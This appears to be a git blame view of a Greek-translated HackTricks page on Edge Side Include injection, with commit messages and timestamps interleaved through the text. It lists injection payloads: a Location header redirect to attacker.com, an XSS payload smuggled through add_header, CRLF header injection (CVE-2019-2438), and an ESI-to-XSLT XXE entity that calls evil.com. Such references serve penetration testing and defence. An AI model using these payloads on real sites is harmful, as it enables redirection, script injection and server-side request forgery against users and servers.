+								Το παρακάτω θα προσθέσει ένα `Location` header στην απάντηση
-												GitBook: [#3733] No subject

											
										
										
											2023-01-04 14:57:03 +00:00
+								```bash
 								<!--esi $add_header('Location','http://attacker.com') -->
 								```
-												Translated to Greek

											
										
										
											2024-02-10 22:40:18 +00:00
+								#### Προσθήκη Κεφαλίδας
-												GitBook: [#3733] No subject

											
										
										
											2023-01-04 14:57:03 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:27:20 +00:00
+								* Προσθήκη κεφαλίδας σε αναγκαστικό αίτημα
-												a

											
										
										
											2024-02-06 03:10:38 +00:00
+								```xml
-												GitBook: [#3605] No subject

											
										
										
											2022-10-15 14:18:24 +00:00
+								<esi:include src="http://example.com/asdasd">
 								<esi:request_header name="User-Agent" value="12345"/>
 								</esi:include>
 								```
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:27:20 +00:00
+								* Προσθέστε κεφαλίδα στην απάντηση (χρήσιμο για να παρακάμψετε το "Content-Type: text/json" σε μια απάντηση με XSS)
-												GitBook: [#3733] No subject

											
										
										
											2023-01-04 14:57:03 +00:00
+								```bash
 								<!--esi/$add_header('Content-Type','text/html')/-->
 								<!--esi/$(HTTP_COOKIE)/$add_header('Content-Type','text/html')/$url_decode($url_decode('"><svg/onload=prompt(1)>'))/-->
-												a

											
										
										
											2024-02-06 03:10:38 +00:00
 								# Check the number of url_decode to know how many times you can URL encode the value
-												GitBook: [#3733] No subject

											
										
										
											2023-01-04 14:57:03 +00:00
+								```
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:27:20 +00:00
+								#### CRLF στο Add header (**CVE-2019-2438**)
-												a

											
										
										
											2024-02-06 03:10:38 +00:00
+								```xml
-												GitBook: [#3605] No subject

											
										
										
											2022-10-15 14:18:24 +00:00
+								<esi:include src="http://example.com/asdasd">
 								<esi:request_header name="User-Agent" value="12345
 								Host: anotherhost.com"/>
 								</esi:include>
 								```
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:27:20 +00:00
+								#### Akamai debug
-												GitBook: [#3605] No subject

											
										
										
											2022-10-15 14:18:24 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:27:20 +00:00
+								Αυτό θα στείλει πληροφορίες αποσφαλμάτωσης που περιλαμβάνονται στην απάντηση:
-												a

											
										
										
											2024-02-06 03:10:38 +00:00
+								```xml
-												GitBook: [master] 8 pages modified
											
										
										
											2021-06-07 09:30:58 +00:00
+								<esi:debug/>
 								```
-												GitBook: [#3540] No subject

											
										
										
											2022-10-03 13:43:01 +00:00
+								### ESI + XSLT = XXE
-												GitBook: [master] 8 pages modified
											
										
										
											2021-06-07 09:30:58 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:27:20 +00:00
+								Με την καθορισμένη τιμή `xslt` για την παράμετρο _dca_, είναι εφικτό να συμπεριληφθεί **`eXtensible Stylesheet Language Transformations (XSLT)`** βασισμένο ESI. Η συμπερίληψη προκαλεί την ανάκτηση των αρχείων XML και XSLT από τον HTTP surrogate, με το δεύτερο να φιλτράρει το πρώτο. Τέτοια αρχεία XML είναι εκμεταλλεύσιμα για επιθέσεις _XML External Entity (XXE)_, επιτρέποντας στους επιτιθέμενους να εκτελούν επιθέσεις SSRF. Ωστόσο, η χρησιμότητα αυτής της προσέγγισης είναι περιορισμένη, καθώς το ESI περιλαμβάνει ήδη ως vector SSRF. Λόγω της απουσίας υποστήριξης στη βασική βιβλιοθήκη Xalan, οι εξωτερικές DTDs δεν επεξεργάζονται, αποτρέποντας την εξαγωγή τοπικών αρχείων.
-												a

											
										
										
											2024-02-06 03:10:38 +00:00
+								```xml
-												GitBook: [master] 8 pages modified
											
										
										
											2021-06-07 09:30:58 +00:00
+								<esi:include src="http://host/poc.xml" dca="xslt" stylesheet="http://host/poc.xsl" />
 								```
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:27:20 +00:00
+								XSLT αρχείο:
-												a

											
										
										
											2024-02-06 03:10:38 +00:00
+								```xml
-												GitBook: [master] 8 pages modified
											
										
										
											2021-06-07 09:30:58 +00:00
+								<?xml version="1.0" encoding="ISO-8859-1"?>
 								<!DOCTYPE xxe [<!ENTITY xxe SYSTEM "http://evil.com/file" >]>
 								<foo>&xxe;</foo>
 								```
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:27:20 +00:00
+								Check the XSLT page:
-												GitBook: [master] 478 pages modified
											
										
										
											2021-06-07 11:31:39 +00:00
-												GITBOOK-4163: change request with no subject merged in GitBook

											
										
										
											2023-11-09 15:12:11 +00:00
+								{% content-ref url="xslt-server-side-injection-extensible-stylesheet-language-transformations.md" %}
 								[xslt-server-side-injection-extensible-stylesheet-language-transformations.md](xslt-server-side-injection-extensible-stylesheet-language-transformations.md)
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								{% endcontent-ref %}
-												GitBook: [master] 478 pages modified
											
										
										
											2021-06-07 11:31:39 +00:00
-												Translated to Greek

											
										
										
											2024-02-10 22:40:18 +00:00
+								### Αναφορές
-												GitBook: [master] 8 pages modified
											
										
										
											2021-06-07 09:30:58 +00:00
 								* [https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/](https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/)
 								* [https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/](https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/)
-												GitBook: [#3540] No subject

											
										
										
											2022-10-03 13:43:01 +00:00
+								* [https://academy.hackthebox.com/module/145/section/1304](https://academy.hackthebox.com/module/145/section/1304)
-												GitBook: [#3733] No subject

											
										
										
											2023-01-04 14:57:03 +00:00
+								* [https://infosecwriteups.com/exploring-the-world-of-esi-injection-b86234e66f91](https://infosecwriteups.com/exploring-the-world-of-esi-injection-b86234e66f91)
-												GitBook: [master] 8 pages modified
											
										
										
											2021-06-07 09:30:58 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:27:20 +00:00
+								## Λίστα Ανίχνευσης Brute-Force
-												GitBook: [master] 10 pages modified
											
										
										
											2021-06-27 21:56:13 +00:00
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssi_esi.txt" %}
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:27:20 +00:00
+								{% hint style="success" %}
 								Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
 								Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:27:20 +00:00
+								<details>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:27:20 +00:00
+								<summary>Support HackTricks</summary>
-												arte

											
										
										
											2023-12-31 01:25:17 +00:00
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:27:20 +00:00
+								* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
 								* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
 								* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>
-												Translated ['generic-methodologies-and-resources/basic-forensic-methodol

											
										
										
											2024-07-19 10:27:20 +00:00
+								{% endhint %}